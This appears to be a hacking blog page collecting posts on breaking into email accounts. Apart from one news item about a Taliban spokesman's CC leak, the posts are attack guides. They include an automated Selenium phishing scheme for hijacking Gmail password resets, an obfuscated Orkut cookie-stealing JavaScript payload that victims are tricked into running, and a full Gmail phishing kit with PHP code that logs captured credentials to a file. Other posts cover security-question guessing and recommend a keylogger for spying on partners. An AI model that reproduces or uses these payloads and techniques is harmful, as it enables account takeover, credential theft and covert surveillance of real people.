Showing posts with label E-MAIL HACKING. Show all posts
Showing posts with label E-MAIL HACKING. Show all posts

Email leaks 400+Taliban official's contacts

Nov 16, 2012 | comments

hacking,email,gmail,yahoo,facebook

That was exactly the rookie mistake made by Taliban spokesman Qari Yousuf Ahmedi last week, ABC News reports, which resulted in Ahmedi inadvertently disclosing his full mailing list of more than 400 email addresses.Ahmedi is one of two official spokesmen for the Islamic fundamentalist movement, the other being Zabiullah Mujahid. Ahmedi was reportedly forwarding a press release he received from Mujahid when he mistakenly put recipients' addresses in "cc" field, causing contacts he meant to keep private to be viewable to everyone on the list.

According to the ABC News report, most of those addresses belonged to journalists. That's bad news (no pun intended), because in war-torn Afghanistan, targeted attacks on journalists are commonplace.

Gmail Hacking Via MITM Based Attack

Apr 19, 2012 | comments (1)

Hacking email account is probably something which intrigues all of us. Phishing is an example of social engineering techniques used to take advantage of human ignorance. It allows unscrupulous people to exploit the weaknesses in web security technology.Here we will discuss about an advanced way which can be used to perform an advanced automated phishing attack.

Setup:


Here our main intention is to abuse the same password reset functionality of various email service providers in a smarter and automated manner.We will use selenium and its Python WebDriver api to automate this entire process.Selenium is a software testing framework for web applications. Selenium can automate browser locally or remotely. http://seleniumhq.org/.) We will write a custom selenium web server in python and a dynamic fake survey form in PHP. The fake survey form will communicate with selenium web server using its custom APIs in back end(using PHP curl or something similar thing).

Execution:


Step 1: Start the custom Selenium Server
 

First we will start our custom selenium web server and host the fake survey form to any hosting service provider supporting PHP and PHP Curl. And we will send the link of that fake survey from to victim.
After the server is started this custom selenium web server will be always monitoring the victim’s activity. When victim visits the fake survey form its will inform the selenium web server through PHP curl that victim has opened the page.

Step 2: Send the custom form to the target
 

Create a fake registration form of anything you like form which will ask the user for the email id. You can create a new interesting free coupon for restaurants, free download etc. When the victim user will enter his/her email id our the custom web server will try to recover the password of that entered email id received from fake survey from using selenium webdriver api automatically. As selenium is quite fast it will take maximum 5 to 6 seconds.

Step 3: Automatically initiate the recovery password reset process

Almost all well known web mail providers (e.g. Google Yahoo etc.)uses some anti automation techniques (Captcha)in these type of critical steps. And those captchas are not very easy to crack by human being also so trying to crack those with available OCR engines will be waste of time.So human effort is must to break those captcha. How? We have a trick for that also.

Step 4: Send back the captcha/secret question/any challenge to the user to break

After detecting an anti automation on page, our selenium web server will extract the captcha from password recovery form and ask the victim to solve the same captcha.When the victim will solve the captcha it will take that answer and submit the actual captcha form.BINGO!
When captcha is cracked it will face the first security question(if its available), then it will extract the first security question from actual password recovery form and add the question in the survey from with other fake questions to make the survey form bit more realistic.

Step 5: Send the user response to Gmail and reset the password

When the victim will answer that question it will instantly take that answer and submit it in actual password recovery from.We expect that the victim will answer the security questions correctly.
After that when it will face the second security question and it will treat this in the same manner. When its done upto this level it will change the account password to our desired one automatically.

Abusing SMS/Email Based Password Recovery system using the same technique:


SMS/Email Based Password Recovery system can also be abused using the same technique. If we consider gmail then it will be like when out custom selenium web server will detect that there is not option from Security question in password recovery from of target email account it will go for SMS based password recovery option. Generally google’s web application discloses the the last two digits of given phone number and it will send the SMS to that phone. Our custom selenium web server will also do the same. It will directly extract the last two digit from recovery form and send it to victim. The phishing from is designed is such a way that it will say something like this

“Hey you have to go through a verification process to download this software package. Please enter your mobile no.We will send a verification code through Google to that number”.
Luckily Google sends the password recover code through SMS very poorly. It will just send a sms like

“Your Google Verification Code is :123456”.

Within a second after entering the mobile number our selenium web server will submit the mobile number and the victim will receive the password reset code from Google. As currently no indication is present in that SMS sent by Google that its a very critical code not like other verification code, so its very obvious for a general Internet user to trust the application and share the password reset code.

In the next step it will ask for the received code and after getting the code our selenium server will do the rest part which is changing the password.

Way to Sniff Corporate Email Via BlackBerry PlayBook

Jan 13, 2012 | comments


Thanks to the explosion of iOS and Android phones and tablets in the consumer and enterprise markets. Now, the spotlight is slowly beginning to turn in the direction of RIM, and specifically its BlackBerry PlayBook tablet.

The first dings in the PlayBook's armor came last month when a group of researchers published a tool that could jailbreak PlayBook tablets through the exploitation of a bug they'd discovered in the operating system. RIM later issued a fix for the jailbreak, but that was just the start of what may end up being a long road for the company's security efforts.

The latest indication is work done by a pair of researchers who found a series of problems and weaknesses in PlayBook, including one that enables an attacker to listen in on the connection between the tablet and a BlackBerry handset. That connection, which is done via Bluetooth in the company's Bridge application, is designed to allow users to access their corporate email, calendar and other data on the tablet.

How The Attack Work :

In order for their attack to work, certain conditions must be present. For example, an app that can access the token must be installed on the PlayBook. A malicious mobile app would satisfy that requirement. Or, if an attacker was able to exploit another flaw on the tablet, he would be able to access that token as well.
RIM is touting the PlayBook as the enterprise-ready tablet, and marketing it aggressively to its large installed BlackBerry customer base. The tablet doesn't currently have a native email client, so users who want to read their corporate email on the PlayBook either need to use a webmail client or connect to their BlackBerry handsets using Bridge.


In addition to the Bridge vulnerability, there are some interesting issues with the BlackBerry AppWorld app store. For one,file names in the store are sequential and therefore predictable, so a user could simply increment the file name to a desired number and download whatever app he chose.

New cookies stealing from mozilla firefox

Mar 2, 2011 | comments

New cookies stealing from mozilla firefox to hack gmail or orkutHacking orkut or Gmail.
With the Help of Cookies or by stealing cookies of the victimBy going through this post i hope you will understand how easy has hacking become with the help of cookies.
By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.
Procedure to hack gmail or orkut through mozilla by stealing cookies:-



* Firstly you need have Mozilla firefox.
* Download cookie editor plugin for Mozilla firefox.
* You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;

nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?

Action.submit';nobody.submit()


How to use cookies script?

1. Replace your number " UserId.value=33444211 "
How to Replace your Number ????
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg
It will be a Eight Digit Value.
3. Now replace your value with the value in the java script .
4. Now Your script will look like


javascript:nobody=replyForm;nobody.toUserId.value=yournumber;

nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));

nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()


5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage

USE FORGOT PASSWORD RECOVERY TO HACK EMAIL ACCOUNTS

Feb 17, 2011 | comments


Passwords can sometimes be guessed by humans with knowledge of the user’s personal information. Examples of guessable passwords include:

    * blank (none)
    * the words “password”, “passcode”, “admin” and their derivatives
    * a row of letters from the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
    * the user’s name or login name
    * the name of a significant other, a friend, relative or pet
    * their birthplace or date of birth, or a friend’s, or a relative’s
    * their automobile license plate number, or a friend’s, or a relative’s
    * their office number, residence number or most commonly, their mobile number.
    * a name of a celebrity they like
    * a simple modification of one of the preceding, such as suffixing a digit, particularly 1, or reversing the order of the letters.
    * swear word

Personal data about individuals are now available from various sources, many on-line, and can often be obtained by someone using social engineering techniques, such as posing as an opinion surveyor or a security control checker. Attackers who know the user may have information as well. For example, if a user chooses the password “YaleLaw78″ because he graduated from Yale Law School in 1978, a disgruntled business partner might be able to guess the password.
For example, in September 2008, the Yahoo e-mail account of Governor of Alaska and Vice President of the United States nominee Sarah Palin was accessed without authorization by someone who was able to research answers to two of her security questions, her zip code and date of birth and was able to guess the third, where she met her husband.
How to use Forgot Password Recovery
Using Password Recovery forms is easy. You just click the “Forgot Password” link and are taken to a series of personal questions like :

    * Username
    * Date of Birth
    * Answer Security Question
    * PIN Code

Now, all the above details are easy to obtain. The only difficult part is guessing security question’s answer.

How to Hack Email

| comments


I know most of you might be wondering to know how tohack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies.

Is it Possible to Hack Email?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.
2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.
3. With my experience of over 8 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.
The following are the only 2 working and foolproof methods to hack any email.

1. HACK ANY EMAIL: EASIEST WAY
The easiest way to hack an email is by using a keylogger (Also known as spy software). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking email.

- The No.1 Keylogger to Access any Email

SniperSpy is a revolutionary software that allows you to easilyaccess *ANY* email account or password protected material such as MySpace or Facebook. There are absolutely *NO* limitations to what accounts or websites this software can access!


§  SniperSpy – For Windows

§  SniperSpy – For Mac

Can I install SniperSpy on a Local Computer?
Yes, you can install SniperSpy on a Local or Remote computer. It supports both Remote and Local installations. So you need not worry whether it is a local or remote PC.

Can I be traced back if I install SniperSpy on a Remote Computer?
No, it is impossible to trace back to you when you install it on a remote computer.

2. OTHER WAYS TO HACK EMAIL

The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details (username and password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers to hack email since it’s the easiest one.

I hope this info has helped you. Happy Email Hacking!!!!!!!!!!!!!

Hack Gmail Account Password Hacking Phishing method

Feb 16, 2011 | comments


We will we use very popular method to hack Gmail account password.I have posted this method for hacking facebook account password earlier  and now gmail account.That is Phishing.This is one of the best method to hack gmail  password.This will work only if your friend don’t know about this method of hacking gmail.
For this We need three files:
1.Fake gmail login page
2.Php file
3.Text file to store password



Create your php file:-

1.Open notepad and copy this code:
    header (“Location: https://gmail.com”);
    $handle = fopen(“password.txt”, “a”);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    }
    fwrite($ handle, “\r\n”);
    fclose($handle) ;
    exit;
    ?>

2.Now save this as gmailphishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create gmail fake login page:-

Now  go to http://www.gmail.com and right click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place where Login  code in gmail page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this

    action=”https://www.google.com/accounts/ServiceLoginAuth?service=mail”

We replace that part with:

    action=”gmailphishing.php”

Save your gmailfake.html file

Text file:-

Create a blank text file and name it password.txt

Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by going to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.

You can use
http://www.justfree.com/
http://www.ripway.com/


Suppose you register with name gmailaccounthack.Your link will be http://www.gmailaccounhack.justfree.com/
After uploading files your phishing link will be http://www.gmailaccount.justfree.com/fakegmail.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like...

NOTE :-“Use this on your own responsibility for educational purpose only“
 
Support : INDIATRIKS
Copyright © 2011. INDIATRIKS - All Rights Reserved
Template Edited By Indiatriks
Proudly Powered By Blogger